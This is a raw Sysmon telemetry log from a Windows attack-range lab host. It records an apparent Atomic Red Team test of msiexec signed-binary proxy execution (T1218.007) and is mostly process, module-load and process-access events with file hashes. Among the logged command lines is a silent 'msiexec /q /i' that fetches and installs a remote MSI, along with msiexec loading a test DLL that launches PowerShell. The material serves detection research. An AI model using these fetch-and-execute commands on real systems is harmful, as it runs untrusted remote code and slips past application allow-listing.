"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-9829-62AC-576B-000000006202}628C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002699746Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.337{7CF983DC-9829-62AC-586B-000000006202}3856C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{7CF983DC-9829-62AC-576B-000000006202}628C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002699728Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.303{7CF983DC-9829-62AC-576B-000000006202}628C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{7CF983DC-EEA1-62A8-9500-000000006202}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 534500x80000000000000002699457Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.256{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699452Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916332c:\windows\system32\msiexec.exe{7CF983DC-9818-62AC-156B-000000006202}2584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll+1321|c:\windows\system32\msiexec.exe+42e0|c:\windows\system32\msiexec.exe+62bd|c:\windows\system32\msiexec.exe+7166|c:\windows\system32\msiexec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002699451Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.255{7CF983DC-9829-62AC-556B-000000006202}2584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -nop -Command Write-Host DllUnregisterServer export executed me; exitC:\AtomicRedTeam\atomics\T1218.007\src\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exec:\windows\system32\msiexec.exe /z "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll"WIN-HOST-MHAAG-\Administrator 734700x80000000000000002699450Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll-----MD5=52E020CF3FCDD1357E769B95FB36072F,SHA256=6F2F3FE71A9673C8D9AD17517D51595182622CBD12FEEAEA93E313267CBE29BDfalse-UnavailableWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699449Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9829-62AC-546B-000000006202}3916c:\windows\system32\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699448Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9829-62AC-546B-000000006202}3916c:\windows\system32\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699447Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699446Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699445Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699444Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699443Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699442Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699441Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699440Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699439Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699438Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699437Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699436Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699435Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699434Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699432Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699430Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699429Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699427Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699426Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.241{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699424Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.225{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699423Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.225{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699421Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.225{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699420Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.225{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699417Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.225{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699416Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.225{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699415Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.225{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699414Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.225{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699411Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.225{7CF983DC-EE97-62A8-7E00-000000006202}18083264C:\Windows\system32\csrss.exe{7CF983DC-9829-62AC-546B-000000006202}3916c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699410Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.225{7CF983DC-9829-62AC-526B-000000006202}6963612C:\Windows\SYSTEM32\cmd.exe{7CF983DC-9829-62AC-546B-000000006202}3916c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\SYSTEM32\cmd.exe+f1e1|C:\Windows\SYSTEM32\cmd.exe+11a37|C:\Windows\SYSTEM32\cmd.exe+cb0d|C:\Windows\SYSTEM32\cmd.exe+c295|C:\Windows\SYSTEM32\cmd.exe+f916|C:\Windows\SYSTEM32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002699409Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.233{7CF983DC-9829-62AC-546B-000000006202}3916C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\windows\system32\msiexec.exe /z "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-9829-62AC-526B-000000006202}696C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /z "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002699349Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.213{7CF983DC-9829-62AC-536B-000000006202}3480C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{7CF983DC-9829-62AC-526B-000000006202}696C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /z "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002699339Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.180{7CF983DC-9829-62AC-526B-000000006202}696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /z "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{7CF983DC-EEA1-62A8-9500-000000006202}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 534500x80000000000000002699087Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.131{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699082Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.131{7CF983DC-9829-62AC-4F6B-000000006202}16083972c:\windows\system32\msiexec.exe{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll+120b|c:\windows\system32\msiexec.exe+42e0|c:\windows\system32\msiexec.exe+62bd|c:\windows\system32\msiexec.exe+7166|c:\windows\system32\msiexec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002699081Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.133{7CF983DC-9829-62AC-506B-000000006202}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -nop -Command Write-Host DllRegisterServer export executed me; exitC:\AtomicRedTeam\atomics\T1218.007\src\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exec:\windows\system32\msiexec.exe /y 